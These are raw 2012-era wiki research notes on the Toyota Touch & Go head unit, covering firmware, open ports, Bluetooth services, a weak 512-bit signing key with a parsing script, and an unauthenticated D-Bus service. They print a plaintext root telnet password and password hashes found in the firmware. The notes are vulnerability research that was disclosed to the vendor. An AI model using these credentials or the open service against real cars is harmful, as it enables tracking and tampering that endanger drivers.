hacker turmio hacker ms hacker wilho started 2012-03-05 12:33:07

Presentation slides from 2012: HappyHackingToyotaTouchAndGo.pdf

Hacking Toyota Touch & Go

New Toyotas can be connected to the Internet via Bluetooth. We wanted to know what is going on under the hood. These are our raw notes, published here for fellow hackers to continue the work.



Yes. We found vulnerabilities similar to the ones Charlie Miller and Chris Valasek found in the famous Jeep #CarHack. You can find their great research here: http://illmatics.com/Remote%20Car%20Hacking.pdf

Instructions from mytoyota.com

Free and paid content can be added to your account on the download services section of this portal. To ensure you install the content correctly onto your Toyota Touch & Go follow the steps below:

1. Create a fingerprint of your Toyota Touch & Go using your USB stick (see guide)
2. Download and install the Toyota Touch & Go Toolbox on your PC (download page)
3. Connect the USB stick to your PC and launch your toolbox
4. Login to your Toyota Touch & Go Toolbox and follow the instructions to download and install your content (see guide)

There is developer documentation about the QNX platform.

e.g.

Firmware

Firmware http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso

/usr/share/swdl.bin looks interesting. Strings findings:

root:C9v0PdmoRiQ9.:1303406650
toyota:QQkI3zYSmefdc

$ file usr/share/V850/teb.bin
usr/share/V850/teb.bin: 8086 relocatable (Microsoft)

usr/share/scripts/install.sh

QNX CAR Application Platform http://www.qnx.com/products/qnxcar/

Open services on QNX machine

23/tcp    open  telnet    Openwall GNU/*/Linux telnetd
851/tcp   open  unknown
2021/tcp  open  servexec?
6020/tcp  open  unknown
6667/tcp  open  irc?
51500/tcp open  ????

/Nmap-run

23 telnet

$ telnet 172.20.10.6
Trying 172.20.10.6...
Connected to 172.20.10.6.
Escape character is '^]'.

QNX Neutrino (localhost) (ttyp0)

login:

Accounts are now publicly known. Harman were kind enough to share the account information with everybody on their scrum wiki.

login: root
password: Mc!AsR3

851 Logdump?

$ nc 192.168.2.6 851
åGåLåLMar 18 14:56:00.050 5 00008 300 io-winmgr: starting up...
Mar 18 14:56:00.177 5 10000 00 Service com.harman.service.ToyotaMGR just appeared at time 7.200323 seconds
Mar 18 14:56:00.276 5 00008 300 io-winmgr: attached to iow-keyboard
Mar 18 14:56:00.335 5 10000 00 pid 340019: Binary persistence for 'TM' is empty.
Mar 18 14:56:00.500 5 00008 300 io-winmgr: no mouse
Mar 18 14:56:00.507 5 00008 300 io-winmgr: attached to iow-touch
Mar 18 14:56:00.697 5 00008 300 io-winmgr: no control
Mar 18 14:56:00.840 5 10000 00 pid 458795: Binary persistence for 'HMI' is empty.

/Port-851-dump

/InsertingUSBKeyboard

/FromLogUSBStickWithFancyFiles

/LogAfterBoot

2021

$ nc 172.20.10.6 2021
<GCF 000163 TS_10_0001081726>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2';
<GCF 000163 TS_10_0001082328>CTRL INFO IOFSMediaBT MSG='iofsmediabt_devctl(1617) DCMD_MEDIA_PLAYBACK_STATUS playstate: 2, speed: 0, playstate_flags: 0, trk_curr: 0, trk_total: 27, skipped: 2';
<GCF 000082 TS_10_0001082381>CALL Bluephone:507 BSS_HFP_Write handle=1 codec=CODEC_HEX data='41542B434C43430D';
<GCF 000055 TS_10_0001082382>CTRL INFO BSSService MSG='received event ET_DATA_SENT';
<GCF 000056 TS_10_0001082383>RESP Bluephone:507 BSS_HFP_Write error=WRITE_ERROR_NONE;
<GCF 000059 TS_10_0001082417>CTRL INFO BSSService MSG='received event ET_DATA_RECEIVED';

/Port-2021-example

6020

$ nc 192.168.2.6 6020
:CTRL CNFG GCFROUTER MODE=STANDARD;

It might be a serial port to the GPS navigation device: http://www.digital-eliteboard.com/showthread.php?88164-Supportthread_1-Becker-Z099-Z1XX-Z2XX-Z302/page52&p=953416&viewfull=1#post953416

6667

If I connect to this port with telnet, it says: ERROR "Unknown command"

e.g.:

$ telnet 192.168.2.4 6667
Trying 192.168.2.4...
Connected to 192.168.2.4.
Escape character is '^]'.
foo
ERROR "Unknown command"

With nc there is nothing.

Clues

Might be D-Bus related:

unix:path=/tmp/dbus-MNzOp3X3nV,guid=e21d288fe52bc59a6d8e19c04bbccfd0;tcp:host=localhost,port=6667,family=ipv4,guid= 1b1a12b5fa8e657b3fd2d05b4bbccfd0

http://community.qnx.com/sf/discussion/do/listPosts/projects.ide/discussion.ide.topc13034

Bug reporter was: Glenn Schmottlach

He has done this before: "D-Bus Platform Support - Ported and adapted D-Bus to QNX where it serves as the primary application IPC mechanism for mid-tier head unit designs. Includes developing an alternative JSON based messaging protocol on top of D-Bus." http://www.linkedin.com/pub/glenn-schmottlach/4/396/a5

http://dbus.freedesktop.org/doc/dbus-specification.html#transports-exec

D-bus tests

DBus-trips

/VulncoordReport

Updated 2014-12: So, it really was D-Bus without any kind of authentication. You can get the car's coordinates, play any Flash content from the Internet on the screen, etc. You really want to keep your car disconnected from the Internet. We reported this to Toyota (2013-02) and they kindly answered (2013-05).

51500

After I send something to the socket, the connection closes.

Bluetooth

Services:
- AVRCP Remote Control
- Advanced Audio
- Hands-Free unit
- Personal Ad-hoc User Service

Device Service Class 0x3b0

/BluetoothServiceDump

Key validation

# cat apps-eu.pub
-----BEGIN PUBLIC KEY-----
MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
-----END PUBLIC KEY-----

% openssl rsa -pubin -in ./fuu.pub -text
Modulus (512 bit):
    00:b8:fd:29:5f:65:ff:07:66:0f:9b:3d:65:4a:d3:
    59:4a:4a:e8:68:fc:3b:11:63:77:b1:2b:39:fb:f3:
    fb:ad:ec:f2:42:3d:58:fb:d4:dc:81:61:b4:74:19:
    29:d9:fc:6a:b6:3a:0f:6b:fd:2f:33:95:fa:4d:af:
    fe:df:36:ec:53
Exponent: 65537 (0x10001)
writing RSA key
-----BEGIN PUBLIC KEY-----
MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
-----END PUBLIC KEY-----
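The 512-bit modulus is the point of the key validation finding: RSA-512 has been factorable with modest resources since the late 1990s, so a content-signing key that short gives no real assurance about what the head unit installs. As an added example (not from the original notes, nor Toyota's or Harman's code), a dependency-free DER walk in Python that reads the apps-eu.pub key quoted above and flags any rsaEncryption SubjectPublicKeyInfo whose modulus is under 2048 bits; it assumes the key is a plain PEM-wrapped SubjectPublicKeyInfo, which is what the notes show.

```python
import base64

# Constructed input: the apps-eu.pub key exactly as quoted in the notes above.
APPS_EU_PUB = """-----BEGIN PUBLIC KEY-----
MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALj9KV9l/wdmD5s9ZUrTWUpK6Gj8OxFj
d7ErOfvz+63s8kI9WPvU3IFhtHQZKdn8arY6D2v9LzOV+k2v/t827FMCAwEAAQ==
-----END PUBLIC KEY-----"""

RSA_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1 rsaEncryption


def _tlv(buf, pos):
    """Read one DER tag/length/value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_pubkey_info(pem):
    """Parse a PEM SubjectPublicKeyInfo and return (modulus_bits, public_exponent)."""
    b64 = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    der = base64.b64decode(b64)
    tag, spki, _ = _tlv(der, 0)                 # SubjectPublicKeyInfo SEQUENCE
    assert tag == 0x30, "expected SEQUENCE"
    tag, alg, pos = _tlv(spki, 0)               # AlgorithmIdentifier SEQUENCE
    oid_tag, oid, _ = _tlv(alg, 0)
    assert oid_tag == 0x06 and oid == RSA_OID, "not an rsaEncryption key"
    tag, bits, _ = _tlv(spki, pos)              # BIT STRING holding RSAPublicKey
    assert tag == 0x03 and bits[0] == 0, "unexpected BIT STRING"
    _, rsa, _ = _tlv(bits, 1)                   # RSAPublicKey SEQUENCE (skip unused-bits byte)
    t_n, n, pos = _tlv(rsa, 0)                  # INTEGER modulus (leading 0x00 is DER sign padding)
    t_e, e, _ = _tlv(rsa, pos)                  # INTEGER publicExponent
    assert t_n == 0x02 and t_e == 0x02, "expected two INTEGERs"
    return int.from_bytes(n, "big").bit_length(), int.from_bytes(e, "big")


def is_weak_rsa(pem, min_bits=2048):
    """True when the key is shorter than the minimum a practitioner would accept today."""
    bits, _ = rsa_pubkey_info(pem)
    return bits < min_bits


if __name__ == "__main__":
    bits, e = rsa_pubkey_info(APPS_EU_PUB)
    print(f"modulus: {bits} bit, exponent: {e}, weak: {is_weak_rsa(APPS_EU_PUB)}")
```

The parser reproduces the openssl output above (512-bit modulus, exponent 65537) without openssl, so the same check can run on any .pub extracted from a firmware image.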

firmware update

http://download.naviextras.com/content/!application/Toyota/OS/EU_Low/2011_12_08/swdl.iso

http://www.vleeuwen.net/

http://www.itviikko.fi/uutiset/2012/03/06/fordin-vastaus-ongelmiin-muistitikku/201224651/7

http://www.harman.com/EN-US/Newscenter/Pages/HARMANdeliversTouchGoupgradeablemultimediasystemforToyotaEuropeanvehicles.aspx

description Hacking Head Unit of Toyota Avensis (Toyota model in Europe)

CategoryProjekti